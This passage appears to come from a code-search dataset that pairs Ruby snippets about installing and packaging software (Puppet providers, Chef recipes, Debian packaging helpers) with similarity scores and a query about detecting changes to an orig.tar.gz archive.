"def install\n args = %w{install -q}\n if @resource[:source]\n args << \"-e\"\n if String === @resource[:ensure]\n args << \"#{@resource[:source]}@#{@resource[:ensure]}#egg=#{\n @resource[:name]}\"\n else\n args << \"#{@resource[:source]}#egg=#{@resource[:name]}\"\n end\n else\n case @resource[:ensure]\n when String\n args << \"#{@resource[:name]}==#{@resource[:ensure]}\"\n when :latest\n args << \"--upgrade\" << @resource[:name]\n else\n args << @resource[:name]\n end\n end\n lazy_pip *args\n end",
"def install\n args = %w{install -q}\n if @resource[:source]\n args << \"-e\"\n if String === @resource[:ensure]\n args << \"#{@resource[:source]}@#{@resource[:ensure]}#egg=#{\n @resource[:name]}\"\n else\n args << \"#{@resource[:source]}#egg=#{@resource[:name]}\"\n end\n else\n case @resource[:ensure]\n when String\n args << \"#{@resource[:name]}==#{@resource[:ensure]}\"\n when :latest\n args << \"--upgrade\" << @resource[:name]\n else\n args << @resource[:name]\n end\n end\n lazy_pip *args\n end",
"def install_management\n # Needed to play with the configuration database.\n package 'debconf'\n package 'debconf-utils'\n\n # Keys for Debian packages.\n package 'debian-archive-keyring'\n\n # Fetch files via HTTP.\n package 'curl'\n package 'wget'\n\n package 'dpkg-dev' # Builds packages from source.\n package 'openssh-server' # SSH into the box.\n\n # For gems with native extensions.\n package 'build-essential'\n package 'g++'\n\n # Pull code from version control.\n package 'subversion'\n package 'git-core'\n\n package 'avahi-daemon' # mDNS, a.k.a. Bonjour\n package 'ddclient' # dynamic DNS\n end",
"def add_repo(pkg)\n if pkg[:repo] != nil\n if pkg[:repo].match(/^deb/)\n if pkg[:key] != nil\n # download and add key, add repo\n script \"add_repository\" do\n interpreter \"bash\"\n user \"root\"\n cwd \"/tmp\"\n code <<-EOS\n wget -q #{pkg[:key]} -O- | apt-key add -\n mkdir -p /etc/apt/sources.list.d\n echo \"#{pkg[:repo]}\" > /etc/apt/sources.list.d/virtualbox.list\n EOS\n end\n end\n elsif pkg[:repo].match(/^ppa/)\n # don't care about :key, add repo\n script \"add_repository\" do\n interpreter \"bash\"\n user \"root\"\n cwd \"/tmp\"\n code \"add-apt-repository #{pkg[:repo]}\"\n end\n end\n end\nend",
"def add(pkg)\n packages_by_name[pkg.name] = pkg\n end",
"def install(env); end",
"def install\n should = @resource.should(:ensure)\n self.debug \"Ensuring => #{should}\"\n wanted = @resource[:name]\n\n # XXX: We don't actually deal with epochs here.\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version\n wanted = \"#{wanted}-#{should}\"\n end\n\n #This has been tested with following zypper versions\n #SLE 10.2: 0.6.104\n #SLE 11.0: 1.0.8\n #OpenSuse 10.2: 0.6.13\n #OpenSuse 11.2: 1.2.8\n #Assume that this will work on newer zypper versions\n\n #extract version numbers and convert to integers\n major, minor, patch = zypper_version.scan(/\\d+/).map{ |x| x.to_i }\n self.debug \"Detected zypper version #{major}.#{minor}.#{patch}\"\n\n #zypper version < 1.0 does not support --quiet flag\n quiet = \"--quiet\"\n if major < 1\n quiet = \"--terse\"\n end\n\n license = \"--auto-agree-with-licenses\"\n noconfirm = \"--no-confirm\"\n\n #zypper 0.6.13 (OpenSuSE 10.2) does not support auto agree with licenses\n if major < 1 and minor <= 6 and patch <= 13\n zypper quiet, :install, noconfirm, wanted\n else\n zypper quiet, :install, license, noconfirm, wanted\n end\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\n \"Could not find package #{self.name}\"\n )\n end\n end",
"def install\n # we prefetched also not installed ports so @portorigin may be present\n name = @portorigin || resource[:name]\n do_portupgrade name, install_options, resource[:package_settings]\n end",
"def install\n # we prefetched also not installed ports so @portorigin may be present\n name = @portorigin || resource[:name]\n do_portupgrade name, install_options, resource[:package_settings]\n end",
"def add_package(package)\n [package_handler(File.extname(package).tr(\".\", \"\")).add(content, package)].flatten.compact\n end",
"def solaris_install_local_package(package_path, noask_directory = nil)\n variant, version, arch, codename = self['platform'].to_array\n\n version = version.split('.')[0] # packages are only published for major versions\n\n error_message = nil\n unless variant == 'solaris'\n error_message = \"Can not call solaris_install_local_package for the \"\n error_message << \"non-solaris platform '#{variant}'\"\n end\n if version != '10' && version != '11'\n error_message = \"Solaris #{version} is not supported by the method \"\n error_message << 'solaris_install_local_package'\n end\n raise ArgumentError, error_message if error_message\n\n if version == '10'\n noask_text = self.noask_file_text\n create_remote_file self, File.join(noask_directory, 'noask'), noask_text\n\n install_cmd = \"gunzip -c #{package_path} | pkgadd -d /dev/stdin -a noask -n all\"\n elsif version == '11'\n install_cmd = \"pkg install -g #{package_path} puppet-agent\"\n end\n self.exec(Beaker::Command.new(install_cmd))\n end",
"def install_from_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n unpack_src(src_package, src_dir)\n sudo <<-SUDO\n sh -c '\n cd #{package_dir};\n #{src_package[:configure]}\n #{src_package[:make]}\n #{src_package[:install]}\n #{src_package[:post_install]}\n '\n SUDO\n end",
"def install_golang_package(resource_name)\n ChefSpec::Matchers::ResourceMatcher.new(:golang_package, :install, resource_name)\n end",
"def install_packages packages\n case DISTRO[0]\n when :opensuse\n installed = %x[rpm -qa].split(\"\\n\")\n packages.select{|pkg| ! installed.detect{|d| d =~ /^#{Regexp.escape(pkg)}/ } }.each do |package|\n # puts \"Installing #{package} ...\"\n %x[sudo zypper install '#{package}']\n end\n when :solaris\n installed = `pkg-get -l`.split(\"\\n\")\n packages.select{|pkg| ! installed.include? pkg }.each do |package|\n sh \"sudo pkg-get install #{package}\"\n end\n else\n installed = `dpkg --list`.split(\"\\n\").map { |x| x.split[1] } # Hm, this is out of scope if defined outside.\n packages.select{ |pkg| ! installed.include? pkg }.each do |package|\n sh \"sudo apt-get -y install #{package}\"\n end\n end\nend",
"def install\n safe_system \"pax --insecure -rz -f Payload.gz -s ',./bin,#{bin},' -s ',./man,#{man},' -s ',./lib,#{lib},' -s ',./license_gpl_pdftk,#{prefix}/LICENSE,' -s ',./,#{prefix}/README/,'\"\n end",
"def install\n end",
"def install\n # nothing to do\n end",
"def install(package, opts = {}, adb_opts = {})\n opt_arg = \"\"\n opt_arg += \" -l\" if opts[:forwardlock]\n opt_arg += \" -r\" if opts[:reinstall]\n opt_arg += \" -s\" if opts[:sdcard]\n run_adb(\"install#{opt_arg} #{package}\", adb_opts)\n end",
"def install_gem(name, options)\n installer = Gem::DependencyInstaller.new(options)\n\n temp_argv(options[:extconf]) do\n log \"Installing #{name}\"\n installer.install(name, options[:version])\n end\n end",
"def install\n args = %w{install -q}\n if @resource[:source]\n args << \"-e\"\n if String === @resource[:ensure]\n args << \"#{@resource[:source]}@#{@resource[:ensure]}#egg=#{\n @resource[:name]}\"\n else\n args << \"#{@resource[:source]}#egg=#{@resource[:name]}\"\n end\n else\n case @resource[:ensure]\n when String\n args << \"#{@resource[:name]}==#{@resource[:ensure]}\"\n when :latest\n args << \"--upgrade\" << @resource[:name]\n else\n args << @resource[:name]\n end\n end\n args << pipproxyarg\n lazy_pip *args\n end",
"def kitchenplan_bundle_install\n\tKitchenplan::Log.info \"#{self.class} : Run kitchenplan bundle install\"\n\tsudo \"bundle install --binstubs=#{self.omnibus_path}/bin --quiet\"\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def install_package\n path = download_path\n windows_package 'Divvy' do\n source path\n installer_type :nsis\n action :install\n end\n end",
"def build_pkg(dist, arch, deps)\n start_dir = Dir.pwd\n build_dir = \"/tmp/rhobuild\"\n version = Rhoconnect::VERSION\n description = '\"Rhoconnect production environment\"'\n prefix = \"/opt/rhoconnect/installer\"\n gem_name = \"rhoconnect-#{version}.gem\"\n\n before_install_script = \"#{build_dir}/unix-like/pre_install.sh\"\n after_install_script = \"#{build_dir}/unix-like/post_install.sh\"\n before_remove_script = \"#{build_dir}/unix-like/pre_uninstall.sh\"\n after_remove_script = \"#{build_dir}/unix-like/post_uninstall.sh\"\n\n `rm -rf #{build_dir}` if File.exist?(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}/unix-like\")\n\n # Copy all necessary Files into the build_dir\n system(\"cp install.sh Gemfile Gemfile.lock #{build_dir}\")\n system(\"cp -r installer/unix-like/*.sh #{build_dir}/unix-like\")\n system(\"cp -r installer/unix-like/*.rb #{build_dir}/unix-like\")\n system(\"cp pkg/#{gem_name} #{build_dir}\")\n\n # cd into the pkg dir so that fpm will create the package into the pkg dir.\n Dir.chdir(\"./pkg\") # it created by build task and should already exist\n\n # Construct fpm command\n fpm_cmd = \"fpm -s dir -t #{dist} -n rhoconnect -v #{version} -a #{arch} -C #{build_dir} --epoch 1 \" +\n \"--before-install #{before_install_script} --after-install #{after_install_script} \" +\n \"--before-remove #{before_remove_script} --after-remove #{after_remove_script} \" +\n \"--prefix #{prefix} --description #{description}\"\n # Add the list of dependencies to the fpm call\n deps.each { |dep| fpm_cmd << \" -d '#{dep}'\" }\n fpm_cmd << \" './'\"\n # Create the package\n system(fpm_cmd)\n # Leave no trace...\n system(\"rm -rf #{build_dir}\")\n Dir.chdir(start_dir)\nend"
] | [
"0.7270667",
"0.7244659",
"0.7169353",
"0.70323354",
"0.7023716",
"0.6977101",
"0.6951155",
"0.6922259",
"0.6880965",
"0.68577975",
"0.684019",
"0.6804202",
"0.6784884",
"0.67558724",
"0.6749211",
"0.6739366",
"0.67260814",
"0.67077416",
"0.67010355",
"0.6678488",
"0.6654429",
"0.6653443",
"0.6629358",
"0.6606326",
"0.65162903",
"0.6506606",
"0.6456502",
"0.64556205",
"0.64549667",
"0.6444388",
"0.6429329",
"0.6423803",
"0.6420406",
"0.63851583",
"0.63778615",
"0.6370828",
"0.63567644",
"0.6348215",
"0.63468647",
"0.63456506",
"0.6339706",
"0.6326554",
"0.632185",
"0.631788",
"0.63042265",
"0.6300589",
"0.6287876",
"0.6249372",
"0.62372863",
"0.6214829",
"0.6214263",
"0.6186617",
"0.61740404",
"0.6131668",
"0.6130622",
"0.6128316",
"0.6119799",
"0.6105746",
"0.61034745",
"0.6097761",
"0.6096183",
"0.6093147",
"0.6084481",
"0.60599905",
"0.6047717",
"0.603117",
"0.6023567",
"0.6018067",
"0.6018067",
"0.6000045",
"0.59998125",
"0.59996253",
"0.59957045",
"0.5970698",
"0.5967656",
"0.5960745",
"0.595837",
"0.595837",
"0.5957164",
"0.5953683",
"0.595022",
"0.5946439",
"0.5945351",
"0.5945193",
"0.5945193",
"0.59394795",
"0.5932248",
"0.5922555",
"0.58989245",
"0.58862066",
"0.5885396",
"0.58803076",
"0.58781123",
"0.58749735",
"0.58676726",
"0.586423",
"0.5863507",
"0.5860006",
"0.58564115",
"0.584844"
] | 0.7763115 | 0 |
We create a diff between the existing orig.tar.gz and the source directory to identify whether there have been any updates. Using 'diff' allows us to apply this test to all kinds of packages | def package_updated?(pkginfo)
# append underscore to make sure version definition follows
registered_orig_tar_gz = reprepro.registered_files(debian_name(pkginfo) + "_",
rock_release_name,
"*.orig.tar.gz")
orig_file_names = Dir.glob("#{debian_name(pkginfo)}*.orig.tar.gz")
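            # Remove stale local copies first, so the glob further below only matches the archive (if any) restored from reprepro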
orig_file_names.each do |file|
FileUtils.rm file
end
if registered_orig_tar_gz.empty?
Packager.info "Apaka::Packaging::Debian::package_updated?: no existing orig.tar.gz found in reprepro"
else
Packager.info "Apaka::Packaging::Debian::package_updated?: existing orig.tar.gz found in reprepro: #{registered_orig_tar_gz}"
FileUtils.cp registered_orig_tar_gz.first, Dir.pwd
end
# Find an existing orig.tar.gz in the build directory
# ignoring the current version-timestamp
orig_file_name = Dir.glob("#{debian_name(pkginfo)}*.orig.tar.gz")
if orig_file_name.empty?
Packager.info "No filename found for #{debian_name(pkginfo)} (existing files: #{Dir.entries('.')} -- package requires update (regeneration of orig.tar.gz)"
return true
elsif orig_file_name.size > 1
raise RuntimeError, "Multiple versions of package #{debian_name(pkginfo)} in #{Dir.pwd} -- you have to fix this first"
else
orig_file_name = orig_file_name.first
end
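            # The package needs regeneration whenever the archived content differs from the current source tree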
!equal_pkg_content?(pkginfo, orig_file_name)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def package_updated?(pkg)\n # Find an existing orig.tar.gz in the build directory\n # ignoring the current version-timestamp\n orig_file_name = Dir.glob(\"#{debian_name(pkg)}*.orig.tar.gz\")\n if orig_file_name.empty?\n return true\n elsif orig_file_name.size > 1\n Packager.warn \"Multiple version of package #{debian_name(pkg)} in #{Dir.pwd} -- you have to fix this first\"\n else\n orig_file_name = orig_file_name.first\n end\n\n # Create a local copy/backup of the current orig.tar.gz in .obs_package \n # and extract it there -- compare the actual source package\n FileUtils.cp(orig_file_name, OBS_LOCAL_TMP) \n Dir.chdir(OBS_LOCAL_TMP) do\n `tar xzf #{orig_file_name}`\n base_name = orig_file_name.sub(\".orig.tar.gz\",\"\")\n Dir.chdir(base_name) do\n diff_name = \"#{orig_file_name}.diff\"\n `diff -urN --exclude .git --exclude .svn --exclude CVS --exclude debian --exclude build #{pkg.srcdir} . > #{diff_name}`\n if File.open(diff_name).lines.any? \n return true\n end\n end\n end\n return false\n end",
"def file_diff(package, from, to, file)\n ret = true\n Dir.mktmpdir {|tmpdir| \n files_found = system(\"cd #{tmpdir} && #{osc_cmd} co #{from} #{package} #{file} && mv #{file} #{file}.new && #{osc_cmd} co #{to} #{package} #{file} >/dev/null 2>&1\")\n unless files_found\n puts \"=== Cannot check out file #{file} from package #{package}\"\n ret = true\n else\n ret = ! system(\"cd #{tmpdir} && diff #{file} #{file}.new\")\n end\n }\n ret\nend",
"def archive_differs_from_disk?(src, dest)\n modified = false\n archive = Archive::Reader.open_filename(src, nil, strip_components: new_resource.strip_components)\n Chef::Log.trace(\"Beginning the comparison of file mtime between contents of #{src} and #{dest}\")\n archive.each_entry do |e|\n pathname = ::File.expand_path(e.pathname, dest)\n if ::File.exist?(pathname)\n Chef::Log.trace(\"#{pathname} mtime is #{::File.mtime(pathname)} and archive is #{e.mtime}\")\n modified = true unless ::File.mtime(pathname) == e.mtime\n else\n Chef::Log.trace(\"#{pathname} doesn't exist on disk, but exists in the archive\")\n modified = true\n end\n end\n modified\n end",
"def diff(other)\n require_cmd! diff_cmd\n out = nil\n\n begin\n this_dir = unpack\n other_dir = other.is_a?(Polisher::Gem) ? other.unpack :\n (other.is_a?(Polisher::Git::Repo) ? other.path : other)\n result = AwesomeSpawn.run(\"#{diff_cmd} -r #{this_dir} #{other_dir}\")\n out = result.output.gsub(\"#{this_dir}\", 'a').gsub(\"#{other_dir}\", 'b')\n rescue\n ensure\n FileUtils.rm_rf this_dir unless this_dir.nil?\n FileUtils.rm_rf other_dir unless other_dir.nil? ||\n !other.is_a?(Polisher::Gem)\n end\n\n out\n end",
"def diff_gitignore\n system(\"diff .gitignore ~/code/tmpl/gitignore-gem\")\n end",
"def diff_gitignore\n system(\"diff .gitignore ~/code/tmpl/gitignore-gem\")\n end",
"def update_files_from(new_source)\n to_add = new_source.file_paths\n @metadata[:files] ||= {}\n @metadata[:files].each { |pkg,spec_files|\n (new_source.file_paths & to_add).each { |gem_file|\n # skip files already included in spec or in dir in spec\n has_file = spec_files.any? { |sf|\n gem_file.gsub(sf,'') != gem_file\n }\n\n to_add.delete(gem_file)\n to_add << gem_file.rpmize if !has_file &&\n !Gem.ignorable_file?(gem_file)\n }\n }\n\n @metadata[:new_files] = to_add.select { |f| !Gem.doc_file?(f) }\n @metadata[:new_docs] = to_add - @metadata[:new_files]\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def make_package_diff(before, after)\n installed = package_diff after, before\n removed = package_diff before, after\n { 'installed' => installed, 'removed' => removed }\n end",
"def test_dry_run\n @options[:dry_run] = true\n\n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n # Still the same\n assert_equal original_file, file_contents('foo.rb')\n end",
"def same?(previous_revision, active_revision, paths = nil)\n run(\"#{git} diff '#{previous_revision}'..'#{active_revision}' --exit-code --name-only -- #{Array(paths).join(' ')} >/dev/null 2>&1\")\n end",
"def local_diff\n `cd #{@local_path} && git diff HEAD`\n end",
"def updated_source_file?; end",
"def test_gem_should_not_change\n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_incorrect_patch\n\n # Create a new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal original_file, file_contents('foo.rb')\n assert_equal original_gemspec, current_gemspec\n end",
"def outdated?\n\t\t\t# Existing directories are never outdated\n\t\t\t!built?\n\t\tend",
"def test_new_file_patch\n @options[:strip] = 0\n \n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_new_file_patch\n\n # Create a new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal original_file, file_contents('bar.rb')\n end",
"def cover_source_by source, specfile\n _source = File.expand_path( \"../../../#{source}\", __FILE__ )\n _spec = File.expand_path(\"../../#{specfile}\", __FILE__)\n FileUtils.touch(_spec) if File.mtime(_source) > File.mtime(_spec)\n File.mtime(_source) <= File.mtime(_spec)\nend",
"def diff\n require \"tempfile\"\n new_file = Tempfile.new([\"new_config.\", \".yml\"])\n new_file.write(sorted_file)\n result = `git diff --no-index -- #{file} #{new_file.path}`.gsub(\n no_slash_beginning(new_file.path),\n no_slash_beginning(file)\n )\n ensure\n new_file.close\n new_file.unlink\n result\n end",
"def move_files_if(src_files, dst_dir = nil)\n Dir[src_files].each do |srcfile|\n cp_action = 0\n dst_dir = File.dirname(src_files).gsub(TMPDIR, '').gsub(/^\\//, '') if dst_dir == nil\n dst_dir << \"/\" unless dst_dir =~ /\\/$/\n dstfile = \"#{dst_dir}#{File.basename(srcfile)}\"\n\n # check if exists similar one in hdl/ directory\n if !File.file? dstfile\n cp_action = 1\n # if exists but differs\n elsif !FileUtils.identical?(dstfile, srcfile) then\n \n puts \"-\" * 43 << \"existing one\" << \"-\" * 44 << '|' << \"-\" * 44 << \"generated\" << \"-\" * 43 << \"\\n\" \n puts %x{diff -y -W200 #{dstfile} #{srcfile} | less }\n puts \"-\" * 200\n print \"Use generated file #{File.basename(srcfile)}? [Y/N] \"\n if $stdin.gets =~ /y/i\n cp_action = 2\n end\n end\n if cp_action > 0\n FileUtils.mkdir_p(dst_dir) unless File.directory? dst_dir\n FileUtils.cp srcfile, dstfile\n if cp_action == 1\n printf(\"%5s %20s %s\\n\",\"\", \" new file added:\", dstfile)\n else\n printf(\"%20s %s\\n\",\" overwrited:\", dstfile)\n end\n end\n end\nend",
"def same?(previous_revision, active_revision, paths=nil)\n run_and_success?(\"#{git} diff '#{previous_revision}'..'#{active_revision}' --exit-code --name-only -- #{Array(paths).join(' ')} >/dev/null 2>&1\")\n end",
"def test_patch\n checkout_dir =File.expand_path(File.join('..','..','..','sequence', 'repository', 'Unidata@thredds'),File.dirname(__FILE__))\n repos = Rugged::Repository.new(checkout_dir)\n from = repos.lookup('49429686c3be8c3cb0aea17fca3e6684706d5fa1')\n to = repos.lookup('f63544cc69b49664a0487bf064ce0c7f64b40641')\n puts \"from #{from}\"\n puts \"to #{to}\"\n diff = to.patch(from)\n puts diff.content\n puts \"patch\"\n diff.patch.lines do |line|\n puts line\n end\n \n #.lines.each do |line|\nend",
"def test_dirs(desc, dir1, dir2)\n\n test_missing_files(desc, dir1, dir2)\n\n dir_files(dir1).each do |file|\n file2 = file.sub(dir1, dir2)\n if File.exist?(file2)\n if diff = diff_file(file, file2)\n @failures << {\n desc: \"#{desc}\\nDiff of file: #{file.sub(dir1+'/', '')}\\n\",\n result: format_diff(diff)\n }\n pout 'F'.red\n else\n pout '.'.green\n end\n end\n end\nend",
"def test_changed\n dir = \"changed_dir\"\n dir1 = \"changed_dir1\"\n dir2 = \"changed_dir2\"\n dir_path = File.join(@wc_path, dir)\n dir1_path = File.join(@wc_path, dir1)\n dir2_path = File.join(@wc_path, dir2)\n dir_svn_path = dir\n dir1_svn_path = dir1\n dir2_svn_path = dir2\n\n file1 = \"changed1.txt\"\n file2 = \"changed2.txt\"\n file3 = \"changed3.txt\"\n file4 = \"changed4.txt\"\n file5 = \"changed5.txt\"\n file1_path = File.join(@wc_path, file1)\n file2_path = File.join(dir_path, file2)\n file3_path = File.join(@wc_path, file3)\n file4_path = File.join(dir_path, file4)\n file5_path = File.join(@wc_path, file5)\n file1_svn_path = file1\n file2_svn_path = [dir_svn_path, file2].join(\"/\")\n file3_svn_path = file3\n file4_svn_path = [dir_svn_path, file4].join(\"/\")\n file5_svn_path = file5\n\n first_rev = nil\n\n log = \"added 3 dirs\\nanded 5 files\"\n make_context(log) do |ctx|\n\n ctx.mkdir([dir_path, dir1_path, dir2_path])\n\n FileUtils.touch(file1_path)\n FileUtils.touch(file2_path)\n FileUtils.touch(file3_path)\n FileUtils.touch(file4_path)\n FileUtils.touch(file5_path)\n ctx.add(file1_path)\n ctx.add(file2_path)\n ctx.add(file3_path)\n ctx.add(file4_path)\n ctx.add(file5_path)\n\n commit_info = ctx.commit(@wc_path)\n first_rev = commit_info.revision\n\n editor = traverse(Svn::Delta::ChangedEditor, commit_info.revision, true)\n assert_equal([\n file1_svn_path, file2_svn_path,\n file3_svn_path, file4_svn_path,\n file5_svn_path,\n ].sort,\n editor.added_files)\n assert_equal([], editor.updated_files)\n assert_equal([], editor.deleted_files)\n assert_equal([].sort, editor.updated_dirs)\n assert_equal([].sort, editor.deleted_dirs)\n assert_equal([\n \"#{dir_svn_path}/\",\n \"#{dir1_svn_path}/\",\n \"#{dir2_svn_path}/\"\n ].sort,\n editor.added_dirs)\n end\n\n log = \"deleted 2 dirs\\nchanged 3 files\\ndeleted 2 files\\nadded 3 files\"\n make_context(log) do |ctx|\n\n dir3 = \"changed_dir3\"\n dir4 = \"changed_dir4\"\n dir3_path = File.join(dir_path, dir3)\n dir4_path = File.join(@wc_path, dir4)\n dir3_svn_path = [dir_svn_path, dir3].join(\"/\")\n dir4_svn_path = dir4\n\n file6 = \"changed6.txt\"\n file7 = \"changed7.txt\"\n file8 = \"changed8.txt\"\n file9 = \"changed9.txt\"\n file10 = \"changed10.txt\"\n file6_path = File.join(dir_path, file6)\n file7_path = File.join(@wc_path, file7)\n file8_path = File.join(dir_path, file8)\n file9_path = File.join(dir_path, file9)\n file10_path = File.join(dir_path, file10)\n file6_svn_path = [dir_svn_path, file6].join(\"/\")\n file7_svn_path = file7\n file8_svn_path = [dir_svn_path, file8].join(\"/\")\n file9_svn_path = [dir_svn_path, file9].join(\"/\")\n file10_svn_path = [dir_svn_path, file10].join(\"/\")\n\n File.open(file1_path, \"w\") {|f| f.puts \"changed\"}\n File.open(file2_path, \"w\") {|f| f.puts \"changed\"}\n File.open(file3_path, \"w\") {|f| f.puts \"changed\"}\n ctx.rm_f([file4_path, file5_path])\n FileUtils.touch(file6_path)\n FileUtils.touch(file7_path)\n FileUtils.touch(file8_path)\n ctx.add(file6_path)\n ctx.add(file7_path)\n ctx.add(file8_path)\n ctx.cp(file1_path, file9_path)\n ctx.cp(file2_path, file10_path)\n ctx.mv(dir2_path, dir3_path)\n ctx.cp(dir1_path, dir4_path)\n ctx.rm(dir1_path)\n\n commit_info = ctx.commit(@wc_path)\n second_rev = commit_info.revision\n\n editor = traverse(Svn::Delta::ChangedEditor, commit_info.revision, true)\n assert_equal([file1_svn_path, file2_svn_path, file3_svn_path].sort,\n editor.updated_files)\n assert_equal([file4_svn_path, file5_svn_path].sort,\n editor.deleted_files)\n 
assert_equal([file6_svn_path, file7_svn_path, file8_svn_path].sort,\n editor.added_files)\n assert_equal([].sort, editor.updated_dirs)\n assert_equal([\n [file9_svn_path, file1_svn_path, first_rev],\n [file10_svn_path, file2_svn_path, first_rev],\n ].sort_by{|x| x[0]},\n editor.copied_files)\n assert_equal([\n [\"#{dir3_svn_path}/\", \"#{dir2_svn_path}/\", first_rev],\n [\"#{dir4_svn_path}/\", \"#{dir1_svn_path}/\", first_rev],\n ].sort_by{|x| x[0]},\n editor.copied_dirs)\n assert_equal([\"#{dir1_svn_path}/\", \"#{dir2_svn_path}/\"].sort,\n editor.deleted_dirs)\n assert_equal([].sort, editor.added_dirs)\n end\n end",
"def compare_inventory_files(old_file, new_file)\n old_inventory = inventory_from(old_file)\n\n\n new_inventory = inventory_from(new_file)\n\n x = (new_inventory - old_inventory).length\n # Excercise: add number of added files\n puts \"The following #{x} file(s) have been added:\"\n puts new_inventory - old_inventory\n\n y = (old_inventory - new_inventory).length\n\n puts \"\"\n # Excercise: add number of deleted files\n puts \"The following #{y} file(s) have been deleted:\"\n puts old_inventory - new_inventory\n\n x = new_inventory.length - x\n\n y = old_inventory.length - y \n\n puts \"\"\n # Excercise: add number of unchanged files\n puts \"Unchanged files: #{x} \"\n puts \"Verification of unchanged files: #{y} \"\nend",
"def has_changes?\r\n @source_files.size > 0\r\n end",
"def compareDirs( relative = \"\" )\n # Combine the base path with the relative path\n original = File.expand_path( File.join( $original, relative ) )\n backup = File.expand_path( File.join( $backup, relative ) )\n\n if $options[:verbose]\n STDOUT.puts \"DEBUG: Comparing [#{original}] to [#{backup}]\" \n end\n\n # Return if this directory has been excluded\n if $options[:ignore].include?( original ) or $options[:ignore].include?( backup )\n $skippedCount += 1\n STDOUT.puts \"SKIP: Skipping comparison of [#{original}] and [#{backup}]\"\n return\n end\n\n # Make sure both directories exist\n unless File.directory?( original ) and File.directory?( backup )\n STDOUT.puts \"DIR: [#{original}] not found in [#{backup}]\"\n # The directory not existing counts as one difference.\n $diffCount += 1 \n # Each item in the directory counts as yet another item processed and yet\n # another difference.\n item_count = countItems( original )\n $itemCount += item_count\n $diffCount += item_count\n return\n end\n\n # If both directories exist, we check their contents\n begin\n Dir.foreach( original ) do |item|\n next if item == \".\" or item == \"..\"\n $itemCount += 1\n origPath = File.join( original, item )\n backupPath = File.join( backup, item )\n\n # This check is independent of whether or not the path is a directory or\n # a file. If either is a symlink, make sure they are both symlinks, and\n # that they link to the same thing.\n if File.symlink?( origPath ) || File.symlink?( backupPath )\n if !(File.symlink?( origPath ) && File.symlink?( backupPath )) ||\n File.readlink( origPath ) != File.readlink( backupPath )\n\n STDOUT.puts \"SYMMIS: Symlink mismatch [#{origPath}] and [#{backupPath}]\"\n\n # Count the differing symlink.\n $diffCount += 1\n\n # FIXME: If follow symlinks is on, we want to count everything that\n # was under that missing symlink directory too.\n\n # We know these paths are different, so move on to the next one.\n next\n end\n end\n\n if File.directory? origPath\n # Skip symlinks if told to do so...\n if File.symlink?( origPath ) and not $options[:follow]\n $skippedCount += 1\n STDOUT.puts \"SYMLINK: [#{origPath}] skipped.\"\n next\n end\n # Stay on one filesystem if told to do so...\n outerDev = File::Stat.new( original ).dev\n innerDev = File::Stat.new( origPath ).dev\n if outerDev != innerDev and $options[:one_filesystem]\n $skippedCount += 1\n STDOUT.puts \"DIFFFS: [#{origPath}] is on a different file system. Skipped.\"\n next\n end\n compareDirs( File.join( relative, item ) )\n else # It's a file\n unless sameFile( origPath, backupPath )\n $diffCount += 1\n STDOUT.puts \"FILE: [#{origPath}] not found at, or doesn't match [#{backupPath}]\"\n end\n end\n end # Dir.foreach\n rescue Errno::EACCES\n STDOUT.puts \"ERROR: Can't read directory [#{original}]\"\n $errorCount += 1\n end\nend",
"def compare_paths(src_path, dst_path)\n match = true\n # assume linux\n md5sum = \"md5sum\"\n md5sum = \"md5\" if node.platform == \"freebsd\"\n\n lib_files = `ls #{src_path}/`.split(/\\n/)\n lib_files.each do |file|\n src = `#{md5sum} #{src_path}/#{file}`.split(/\\s+/)\n dst = `#{md5sum} #{dst_path}/#{file}`.split(/\\s+/)\n match = false if (src[0] != dst[0])\n end\n return match\nend",
